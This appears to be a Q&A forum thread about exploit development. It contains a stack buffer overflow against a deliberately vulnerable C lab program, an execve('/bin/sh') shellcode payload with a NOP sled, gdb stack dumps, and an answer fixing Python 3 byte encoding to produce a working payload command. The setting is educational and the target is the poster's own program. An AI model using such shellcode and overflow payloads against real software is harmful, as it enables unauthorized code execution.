After finding the eip
offset i'm trying to input some shell code to my program. With the following command run $(python -c 'print("A"*108 + "BBBB")')
i get the following output
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
Now the problem occurs when i try to add my shell code. When i input
run $(python -c 'print("\x90"*63 + "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "B" * 20)')
i don't get what i was exepected, the return address being overwritten with B's, but i get the following
Program received signal SIGSEGV, Segmentation fault.
0x90c290c2 in ?? ()
It does work, when i increase the number of B's to 48 and decrease the number of NOPs to 35, but i'm not quite understanding why this doesn't work with more NOPs and less B's for the return address. One other thing i do not understand is that i'm not seeing any NOPs in my stack.
(gdb) x/200x $esp
0xffffd2a0: 0x42424242 0x42424242 0x42424242 0x42424242
0xffffd2b0: 0x42424242 0x42424242 0x42424242 0x42424242
0xffffd2c0: 0x42424242 0x42424242 0x00424242 0x00000001
0xffffd2d0: 0xffffd398 0x68e47ce5 0x9e780f0a 0x00000000
0xffffd2e0: 0x00000000 0x00000000 0xffffd3e0 0x0804b519
0xffffd2f0: 0x00000000 0x08049c76 0xffffd3e0 0x0804b52d
0xffffd300: 0x00000000 0x00000000 0x00000000 0x0804968d
0xffffd310: 0x00000040 0x0000000c 0x00000040 0x00000008
0xffffd320: 0x00040000 0x00000040 0x00002000 0x00300000
0xffffd330: 0x00090000 0x00040000 0x00002000 0x00008000
0xffffd340: 0xffffd370 0xffffd3d4 0x00000002 0x00000001
0xffffd350: 0x00000006 0x00000045 0x00000001 0x00300000
0xffffd360: 0x000c0000 0x00000004 0x00000001 0x00000000
0xffffd370: 0xffffffff 0x00000000 0x080e3620 0x00000000
0xffffd380: 0x00000000 0x00000000 0xffffd3b0 0x080e3ff4
0xffffd390: 0x00000002 0x00000000 0x00000000 0x08049688
0xffffd3a0: 0x00000000 0x00000000 0x00000000 0x08049688
0xffffd3b0: 0x0804968d 0x00000002 0xffffd3d4 0x00000000
0xffffd3c0: 0x00000000 0x00000000 0xffffd3cc 0x00000000
0xffffd3d0: 0x00000002 0xffffd5d2 0xffffd609 0x00000000
0xffffd3e0: 0xffffd6a5 0xffffd6b5 0xffffd6c9 0xffffd6ff
0xffffd3f0: 0xffffd70c 0xffffd746 0xffffd773 0xffffd78a
0xffffd400: 0xffffd79e 0xffffd7d1 0xffffd80f 0xffffd826
0xffffd410: 0xffffd83e 0xffffd881 0xffffd891 0xffffd89d
0xffffd420: 0xffffd8bd 0xffffd8cc 0xffffd8ff 0xffffd90a
0xffffd430: 0xffffd925 0xffffd93a 0xffffd94f 0xffffd95e
0xffffd440: 0xffffd97e 0xffffd9ac 0xffffd9bb 0xffffd9c4
0xffffd450: 0xffffda14 0xffffda22 0xffffda33 0xffffda48
0xffffd460: 0xffffda60 0xffffda6c 0xffffdaf0 0xffffdb01
0xffffd470: 0xffffdb35 0xffffdb64 0xffffdbb0 0xffffdbbf
0xffffd480: 0xffffdbd4 0xffffdbeb 0xffffdc09 0xffffdc1d
0xffffd490: 0xffffdc25 0xffffdc3b 0xffffdc6d 0xffffdc78
0xffffd4a0: 0xffffdc80 0xffffdc99 0xffffdcb4 0xffffdcbf
0xffffd4b0: 0xffffdcd0 0xffffdcef 0xffffdd21 0xffffdd35
0xffffd4c0: 0xffffdd53 0xffffdd6a 0xffffdd83 0xffffdda1
0xffffd4d0: 0xffffde16 0xffffde2c 0xffffde3c 0xffffdf08
0xffffd4e0: 0xffffdf1a 0xffffdf50 0xffffdf6c 0xffffdf84
0xffffd4f0: 0xffffdf9b 0x00000000 0x00000020 0xf7ffc570
0xffffd500: 0x00000021 0xf7ffc000 0x00000033 0x000006f0
0xffffd510: 0x00000010 0xbfebfbff 0x00000006 0x00001000
0xffffd520: 0x00000011 0x00000064 0x00000003 0x08048034
0xffffd530: 0x00000004 0x00000020 0x00000005 0x00000009
0xffffd540: 0x00000007 0x00000000 0x00000008 0x00000000
0xffffd550: 0x00000009 0x08049660 0x0000000b 0x000003e8
0xffffd560: 0x0000000c 0x000003e8 0x0000000d 0x000003e8
0xffffd570: 0x0000000e 0x000003e8 0x00000017 0x00000000
0xffffd580: 0x00000019 0xffffd5bb 0x0000001a 0x00000002
0xffffd590: 0x0000001f 0xffffdfc1 0x0000000f 0xffffd5cb
0xffffd5a0: 0x0000001b 0x0000001c 0x0000001c 0x00000020
0xffffd5b0: 0x00000000 0x00000000 0x62000000 0x9e72e32a
I'm using Python 3. The shell code is 25 bytes long. I have already disabled ASLR. This is my code in C
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv){
char buffer[100];
strcpy(buffer, argv[1]);
return 0;
}
Python3's string literals "..."
default to UTF-8 (Unicode) encoding when print
ing, not 8-bit ASCII (ISO-8859-1/Latin-1). As a result extra characters are being output that renders your shellcode unusable.
If you were to run your Python command like:
python -c 'print("\x90"*63 + "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "B" * 20)' | hexdump -C
Piping the output through hexdump
can make the issue more obvious. The output will look something like:
00000000 c2 90 c2 90 c2 90 c2 90 c2 90 c2 90 c2 90 c2 90 |................|
*
00000070 c2 90 c2 90 c2 90 c2 90 c2 90 c2 90 c2 90 c3 ab |................|
00000080 0b 5b 31 c3 80 31 c3 89 31 c3 92 c2 b0 0b c3 8d |.[1..1..1.......|
00000090 c2 80 c3 a8 c3 b0 c3 bf c3 bf c3 bf 2f 62 69 6e |............/bin|
000000a0 2f 73 68 42 42 42 42 42 42 42 42 42 42 42 42 42 |/shBBBBBBBBBBBBB|
000000b0 42 42 42 42 42 42 42 0a |BBBBBBB.|
000000b8
You'll notice that the value C2
and C3
have been inserted into the middle of your code for those characters that are >= 0x80. As a result the output is no longer suitable as shellcode.
If you switch to using Python2 the problem would resolve itself since it doesn't default to a Unicode character set. Something that works for Python2 and Python3 is the use of byte string literals b'...'
and use sys.stdout.buffer.write
to output the bytes to standard output.
A command like this should work in GDB:
run $(python -c "import sys; sys.stdout.buffer.write(b'\x90'*63 + b'\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + b'B' * 20)")